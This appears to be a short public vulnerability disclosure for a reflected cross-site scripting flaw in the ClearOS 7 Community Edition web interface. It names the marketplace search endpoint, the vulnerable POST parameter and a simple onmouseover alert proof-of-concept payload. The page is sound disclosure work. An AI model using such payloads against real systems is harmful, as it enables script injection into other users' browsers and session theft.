ClearOS 7 Community Edition Cross Site Scripting

2019.03.07
Credit: Ozer Goker
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################################################################################################################## # Exploit Title: ClearOS 7 Community Edition | Cross-Site Scripting # Date: 06.03.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://www.clearos.com # Software Link: http://mirror.clearos.com/clearos/7/iso/x86_64/ClearOS-DVD-x86_64.iso # Version: 7 ################################################################################################################################## Introduction ClearOS is a small business server operating system with server, networking, and gateway functions. It is designed primarily for homes, small, medium, and distributed environments. It is managed from a web based user interface, but can also be completely managed and tuned from the command line. ClearOS is available in a free Community Edition, which includes available open source updates and patches from its upstream sources. ClearOS is also offered in a Home and Business Edition which receives additional testing of updates and only uses tested code for updates. Professional tech-support is also available. Currently ClearOS offers around 100+ different features which can be installed through the onboard ClearOS Marketplace. ################################################################################# XSS details ################################################################################# XSS1 | Reflected URL https://192.168.2.104:81/app/marketplace/search METHOD Post PARAMETER search PAYLOAD ' onmouseover=alert(1) ' #################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top